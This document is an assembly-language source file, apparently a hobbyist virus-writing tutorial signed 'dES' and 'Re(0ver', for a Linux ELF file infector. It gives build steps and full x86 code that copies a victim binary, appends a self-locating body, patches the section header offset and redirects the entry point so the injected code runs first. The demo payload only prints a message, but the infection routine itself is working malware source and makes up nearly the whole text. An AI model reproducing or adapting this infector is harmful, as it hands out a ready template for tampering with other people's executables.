// Linux Infector // // // Written by: // dES // Re(0ver // // e-mail: (destroyerb@hotmail.com) // // How you can test it: // // 1. you need the victim: // $ touch victim.s // where must be --> .global _start _start: movl $endstring, %edx movl $message, %ecx xorl %ebx, %ebx movl $0x4, %eax int $0x80 movl $0x1, %eax xorl %ebx, %ebx int $0x80 message: .string "Oh, no! Why me?!\n" endstring=.-message // <---- victim.s // // 3. $ as victim.s // 4. $ ld -o victim -s a.out // // 5. Okay, victim ready, now we have to prepare infector: // $ touch infector.s // where is --> .data .include "macroses.inc" victim:.string "./victim" result:.string "/infectvictim" newshoff: entrysize: newentry: .long 0 tmphandle:.long 0 symtpos: symindex:.long 0 oldpoint: .long 0 message:.string "Hel!\n" buffer:.byte 0 .global _start _start: //------------------ Choose victim fopen $victim, $0x2, $0 pushl %eax //------------------ Create result-file fopen $result, $01102, $00700 // O_RDWR | O_CREAT | O_TRUNC movl %eax, tmphandle //------------------ Geting an old entry point popl %ebx fseek $0x18, $0x0 fread $address, $0x4 //------------------ Geting an old section header table offset fseek $0x20, $SEEK_SET fread $oldpoint, $0x4 //------------------ Geting a section header table entry size fseek $0x2e, $SEEK_SET fread $entrysize, $0x4 //size+2 //------------------ Calculating new entry point fread $symindex, $0x2 pushl %ebx xorl %eax, %eax xorl %ebx, %ebx movw symindex, %bx movw entrysize, %ax mull %ebx addl oldpoint, %eax movl %eax, oldpoint addl $0x10, oldpoint popl %ebx fseek oldpoint, $SEEK_SET movl oldpoint, %eax movl %eax, symtpos fread $oldpoint, $0x4 //------------------- Forming 2nd part for writing fseek $0x0, $SEEK_END subl oldpoint, %eax pushl %eax //------------------ Copying file xorl %edx, %edx // SEEK_SET xorl %ecx, %ecx // entry point in ELF movl $0x13, %eax // Seek in file int $0x80 cmpl $0xfffff001, %eax // if error jae error1 movl oldpoint, %ecx looper: pushl %ecx fread $buffer, $0x1 pushl %ebx movl tmphandle, %ebx fwrite $buffer, $0x1 popl %ebx popl %ecx loop looper //------------------ Write body to the end pushl %ebx movl tmphandle, %ebx fwrite $bodystart, $(bodyend-bodystart) popl %ebx //------------------ Append popl %ecx looper2: pushl %ecx fread $buffer, $0x1 pushl %ebx movl tmphandle, %ebx fwrite $buffer, $0x1 popl %ebx popl %ecx loop looper2 fclose // It doesn't need //--------------------- Set New section header table offset movl tmphandle, %ebx fseek $0x20, $SEEK_SET fread $newshoff, $0x4 addl $(bodyend-bodystart), newshoff fseek $0x20, $SEEK_SET fwrite $newshoff, $0x4 //-------------- New Entry Point fseek $0x18, $SEEK_SET addl $0x08048000, oldpoint fwrite $oldpoint, $0x4 //--------------- New SymIndex addl $(bodyend-bodystart), symtpos fseek symtpos, $SEEK_SET addl $(bodyend-bodystart), oldpoint subl $0x08048000, oldpoint fwrite $oldpoint, $0x4 //--------------------- Close close: fclose jmp ne error1: xorl %ebx, %ebx // stdout fwrite $message, $0x5 ne: xorl %ebx, %ebx // stdout movl $0x1, %eax int $0x80 bodystart: call .+5 // Get IP popl %ebp subl $0x5, %ebp movl $0xa, %edx movl $(shere-bodystart), %ecx addl %ebp, %ecx xorl %ebx, %ebx movl $0x4, %eax int $0x80 mov $(address-bodystart), %ebx add %ebp, %ebx mov (%ebx), %eax call *%eax // bye address: .long 0 shere: .string "I'm here!\n" bodyend: // <-- infector.s // 7. run // $ ./infector // $ ./victim // 8. And you will see it: // I'm here! // Oh, no! Why me?! // // That's all! We're waiting mails. Cua......